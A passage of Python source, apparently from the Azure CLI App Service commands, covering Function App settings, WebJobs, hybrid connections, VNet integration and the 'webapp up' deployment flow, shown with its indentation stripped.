return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
# content share name should be up to 63 characters long, lowercase letter and digits, and random
# so take the first 50 characters of the app name and add the last 12 digits of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
# Temporary fix due to regression in this specific API with 2021-03-01, should be removed with the next SDK update
client = web_client_factory(cmd.cli_ctx, api_version='2020-09-01')
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx, api_version="2020-09-01")
full_sku = get_sku_tier(sku)
# Temporary fix due to regression in this specific API with 2021-03-01, should be removed with the next SDK update
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot, client=client)
parsed_plan = parse_resource_id(app.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
app.virtual_network_subnet_id = subnet_info["subnet_resource_id"]
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot,
client=client, extra_parameter=app)
# Enable Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
return {
"id": subnet_info["vnet_resource_id"],
"location": plan_info.location, # must be the same as vnet location bc of validation check
"name": subnet_info["vnet_name"],
"resourceGroup": subnet_info["resource_group_name"],
"subnetResourceId": subnet_info["subnet_resource_id"]
}
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
from azure.cli.core.commands.client_factory import get_subscription_id
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
vnet_client = network_client_factory(cmd.cli_ctx)
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
'--resource-group %s '
'--name %s '
'--vnet-name %s '
'--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == LINUX_OS_NAME
helper = _StackRuntimeHelper(cmd, linux=_is_linux, windows=not _is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime, _is_linux)
if not match:
raise ValidationError("{0} runtime '{1}' is not supported. Please check supported runtimes with: "
"'az webapp list-runtimes --os {0}'".format(os_name, runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html, is_linux=_is_linux)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language, helper, _is_linux)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise ValidationError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError("Unable to retrieve details of the existing app '{}'. Please check that the "
"app is a part of the current subscription if updating an existing app. If "
"creating a new app, app names must be globally unique. Please try a more "
"unique name or leave unspecified to receive a randomly "
"generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise ValidationError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise ValidationError("The plan name entered '{}' does not match the plan name that the webapp is "
"hosted in '{}'. Please check if you have configured defaults for plan name "
"and re-run command.".format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise ValidationError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime, app_service_environment)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan,
is_linux=_is_linux,
client=client)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_tier(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except ResourceNotFoundError as ex:
raise ex
except CLIError as ex:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, linux=_is_linux, windows=not _is_linux)
match = helper.resolve(runtime_version, _is_linux)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match.configs['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match.configs['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match.configs['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
_set_webapp_up_default_args(cmd, rg_name, sku, plan, loc, name)
return create_json
def _set_webapp_up_default_args(cmd, rg_name, sku, plan, loc, name):
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
logger.warning("Setting 'az webapp up' default arguments for current directory. "
"Manage defaults with 'az configure --scope local'")
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
logger.warning("--resource-group/-g default: %s", rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
logger.warning("--sku default: %s", sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
logger.warning("--plan/-p default: %s", plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
logger.warning("--location/-l default: %s", loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
logger.warning("--name/-n default: %s", name)
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
app_settings = _generic_site_operation(cmd.cli_ctx, rg_name, name, 'list_application_settings', slot=None)
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match.configs.items():
for app_setting_name, app_setting_value in app_settings.properties.items():
if app_setting_name == k and app_setting_value != v:
update_needed = True
settings.append(f"{k}={v}")
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match.configs.items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
